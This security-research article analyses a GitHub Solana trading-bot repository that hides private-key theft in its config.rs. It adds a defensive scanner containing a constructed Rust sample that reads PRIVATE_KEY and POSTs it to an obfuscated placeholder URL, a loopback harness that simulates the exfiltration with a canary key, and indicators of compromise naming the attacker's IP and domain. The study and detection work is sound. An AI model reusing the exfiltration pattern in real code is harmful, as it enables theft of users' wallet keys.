Malicious Bots Reappear in the Solana Ecosystem, Open Source Project Hides Private Key Theft Trap


Recently, a user had their cryptocurrency assets stolen after running an open-source project called pumpfun-pumpswap-sniper-copy-trading-bot. The security team analysed the project in depth.

Static Analysis

The suspicious code sits in the configuration file /src/common/config.rs, concentrated in the create_coingecko_proxy() method. This method first calls import_wallet() to obtain the private key, then decodes an obfuscated URL.

The decoded address points to the attacker-controlled server listed under Intrusion Indicators below.

The malicious code then builds a JSON request body with the private key embedded in it and sends it to that URL in a POST request. Whatever the server replies, execution continues normally so that the user notices nothing.

create_coingecko_proxy() is invoked at application start-up, during the configuration-initialisation phase of main() in main.rs, so the key is exfiltrated before the bot does any trading at all.

The project was most recently updated on GitHub on July 17, 2025. The main change was to config.rs under src, where the original encoding of HELIUS_PROXY (the attacker's server address) was replaced with a new encoding; in other words, the exfiltration endpoint was rotated without touching the rest of the code.
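The triad described above (an obfuscated URL constant, a read of the wallet key, and an outbound HTTP send in the same file) can be hunted mechanically before a repository is ever run. The scanner below is an added example written for this article, not the analysts' tooling and not code from the project; it assumes the hidden address is a base64 or hex string literal (the article does not state which encoding the project used), that the key is read by the name PRIVATE_KEY, and that HTTP goes through reqwest. The two Rust snippets inside it are constructed samples modelled on the description, not the real config.rs.

```python
"""Scan Rust sources for the private-key exfiltration pattern described above.

Added example, not the article's tooling or the analysed project's code.
Assumptions: the obfuscated server address is a string literal encoded with
base64 or hex (the article does not say which encoding the project used),
the key is read via the PRIVATE_KEY environment variable, and outbound HTTP
goes through reqwest.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Ordinary "..." literals with simple escapes; raw strings (r"...") are not handled.
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Any reference to the wallet key by its environment-variable name.
KEY_READ = re.compile(r'\bPRIVATE_KEY\b')
# Outbound HTTP client construction or POST.
HTTP_SEND = re.compile(r'\.post\(|Client::new\(|reqwest::')


def try_decode(literal: str) -> Optional[str]:
    """Return the decoded text if the literal is base64 or hex hiding an http(s) URL."""
    raw = literal.strip()
    candidates = []
    try:
        candidates.append(base64.b64decode(raw, validate=True))
    except (binascii.Error, ValueError):
        pass
    try:
        candidates.append(bytes.fromhex(raw))
    except ValueError:
        pass
    for blob in candidates:
        try:
            text = blob.decode("ascii")
        except UnicodeDecodeError:
            continue
        if text.startswith(("http://", "https://")):
            return text
    return None


def scan_rust_source(source: str) -> Dict[str, List[str]]:
    """Line-by-line scan of one Rust file; findings are grouped by category."""
    findings: Dict[str, List[str]] = {"decoded_urls": [], "key_reads": [], "http_sends": []}
    for lineno, line in enumerate(source.splitlines(), 1):
        for lit in STRING_LITERAL.findall(line):
            url = try_decode(lit)
            if url:
                findings["decoded_urls"].append(f"line {lineno}: {lit!r} -> {url}")
        if KEY_READ.search(line):
            findings["key_reads"].append(f"line {lineno}: {line.strip()}")
        if HTTP_SEND.search(line):
            findings["http_sends"].append(f"line {lineno}: {line.strip()}")
    return findings


def is_suspicious(findings: Dict[str, List[str]]) -> bool:
    """Hidden URL + key read + outbound send in one file is the combination to escalate on."""
    return all(findings[k] for k in ("decoded_urls", "key_reads", "http_sends"))


# Constructed sample modelled on the article's description; not the real config.rs.
# The literal is base64 of "https://example.invalid/api".
MALICIOUS_SAMPLE = '''
pub const HELIUS_PROXY: &str = "aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvYXBp";

pub fn create_coingecko_proxy() {
    let wallet = import_wallet();
    let url = String::from_utf8(base64::decode(HELIUS_PROXY).unwrap()).unwrap();
    let body = serde_json::json!({ "private_key": wallet.private_key });
    let _ = reqwest::blocking::Client::new().post(&url).json(&body).send();
}

fn import_wallet() -> Wallet {
    Wallet { private_key: std::env::var("PRIVATE_KEY").unwrap() }
}
'''

# Constructed benign config: a plain URL literal and no key handling.
BENIGN_SAMPLE = '''
pub const PRICE_API: &str = "https://example.invalid/price";
pub fn price_url(symbol: &str) -> String { format!("{}/{}", PRICE_API, symbol) }
'''

if __name__ == "__main__":
    for name, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        result = scan_rust_source(src)
        print(f"{name}: suspicious={is_suspicious(result)}")
        for category, hits in result.items():
            for hit in hits:
                print(f"  [{category}] {hit}")
```

Run it over every .rs file in a checkout before building; a single hit in decoded_urls is already worth a manual look, because legitimate configs rarely have a reason to obfuscate an endpoint. The scanner is deliberately simple (one file at a time, no raw-string or multi-line literal support), which is enough for the pattern here but will miss addresses assembled at run time from pieces.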


Dynamic Analysis

To observe the theft directly, the researchers wrote a Python script to generate a test Solana keypair and stood up an HTTP server to receive POST requests.

They then replaced the attacker's encoded server address in config.rs with an encoding of the test server's address, and set PRIVATE_KEY in the .env file to the test private key.

After the bot was started, the test server received the JSON payload sent by the project, and it contained the PRIVATE_KEY value.
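The harness below reproduces that procedure end to end. It is an added example written for this article, not the researchers' script and not code from the project. It assumes that PRIVATE_KEY in .env is a base58 string in the 64-byte layout Solana keypair files use; the canary it plants is random bytes in that layout rather than a real Ed25519 keypair, which is enough to prove the value left the machine without putting real funds at risk. simulate_bot_post() stands in for launching the bot and is the only part you replace when testing a real repository.

```python
"""Local harness that catches a private key exfiltrated over HTTP.

Added example, not the article's script and not the project's code.
Assumptions: PRIVATE_KEY in .env is a base58 string in the 64-byte layout
Solana keypair files use; the canary is random bytes in that layout, not a
real Ed25519 keypair.
"""
import json
import secrets
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import List, Optional
from urllib.request import Request, urlopen

B58_ALPHABET = b"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58encode(raw: bytes) -> str:
    """Base58 as used by Solana tooling (no checksum)."""
    n = int.from_bytes(raw, "big")
    digits = bytearray()
    while n:
        n, rem = divmod(n, 58)
        digits.append(B58_ALPHABET[rem])
    leading_zeros = len(raw) - len(raw.lstrip(b"\x00"))  # each becomes a '1'
    return (B58_ALPHABET[:1] * leading_zeros + digits[::-1]).decode()


def make_canary_key() -> str:
    """64 random bytes in the keypair-file layout: looks like a key, signs nothing."""
    return b58encode(secrets.token_bytes(64))


def write_env(path: str, private_key: str) -> None:
    with open(path, "w") as f:
        f.write(f"PRIVATE_KEY={private_key}\n")


def read_env_key(path: str) -> str:
    """Minimal .env reader (no python-dotenv dependency)."""
    with open(path) as f:
        for line in f:
            if line.startswith("PRIVATE_KEY="):
                return line.split("=", 1)[1].strip()
    raise KeyError("PRIVATE_KEY not set in " + path)


class CaptureHandler(BaseHTTPRequestHandler):
    """Records every POST body and replies 200 so the caller carries on as the bot would."""
    captured: List[bytes] = []

    def do_POST(self) -> None:
        length = int(self.headers.get("Content-Length", "0"))
        CaptureHandler.captured.append(self.rfile.read(length))
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.end_headers()
        self.wfile.write(b"{}")

    def log_message(self, *args) -> None:  # silence per-request logging
        pass


def start_capture_server() -> HTTPServer:
    """Listen on a random loopback port; encode server_url() into the bot's config."""
    server = HTTPServer(("127.0.0.1", 0), CaptureHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def server_url(server: HTTPServer) -> str:
    host, port = server.server_address[:2]
    return f"http://{host}:{port}/"


def find_leak(bodies: List[bytes], canary: str) -> Optional[dict]:
    """First captured body containing the canary, parsed as JSON (or wrapped raw)."""
    for body in bodies:
        if canary.encode() in body:
            try:
                return json.loads(body)
            except json.JSONDecodeError:
                return {"raw": body.decode(errors="replace")}
    return None


def simulate_bot_post(url: str, env_path: str) -> None:
    """Stand-in for the bot's start-up code: read .env, wrap the key in JSON, POST it."""
    payload = json.dumps({"private_key": read_env_key(env_path)}).encode()
    req = Request(url, data=payload, headers={"Content-Type": "application/json"})
    with urlopen(req, timeout=5) as resp:
        resp.read()  # the response is ignored, exactly as in the malicious code


if __name__ == "__main__":
    import os, tempfile
    canary = make_canary_key()
    env_path = os.path.join(tempfile.mkdtemp(), ".env")
    write_env(env_path, canary)
    server = start_capture_server()
    simulate_bot_post(server_url(server), env_path)  # replace with launching the bot
    server.shutdown()
    leak = find_leak(CaptureHandler.captured, canary)
    print("leaked:" if leak else "clean", json.dumps(leak) if leak else "")
```

Searching every captured body for the canary string, rather than only parsing JSON, also catches variants that send the key as a form field or in a header-like raw body; the JSON parse is just to show the surrounding structure once a hit is found. Run the real bot in a disposable VM with its encoded HELIUS_PROXY pointing at server_url(), never on a machine that holds a funded wallet.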


Intrusion Indicators (IoCs)

IP: 103.35.189.28
Domain: storebackend-qpq3.onrender.com

Malicious repository: pumpfun-pumpswap-sniper-copy-trading-bot (the project named above).

Other repositories with the same implementation were also identified.


Summary

The attacker disguises malicious code as a legitimate open-source project to lure users into downloading and running it. The project reads sensitive values from the local .env file and transmits the stolen private key to a server under the attacker's control.

Developers should be highly wary of unfamiliar GitHub projects, especially ones that handle wallets or private keys. If such a project must be run or debugged, do so in an isolated environment that holds no real keys or other sensitive data, and never execute programs or commands from untrusted sources. A private key that has been loaded into a project of this kind should be treated as compromised, and any funds it controls moved to a fresh wallet.

Comments

NFTDreamervip · 18h ago
Another trap for suckers, the tricks are too familiar.

LiquidationWatchervip · 18h ago
I really didn't expect that sol had such a trap.

AirdropHunterWangvip · 18h ago
If you're foolish, you just have to fall into traps. Once you get trapped with the Private Key, there's no way to escape.

BlockTalkvip · 18h ago
Another person has been played for suckers by Solana...

EthMaximalistvip · 19h ago
Tsk tsk, the sol chain is frequently hacked.

GovernancePretendervip · 19h ago
Daily reminder, another pitfall, be careful, retail investors.

BearMarketSurvivorvip · 19h ago
I want to see who else dares to touch this bot.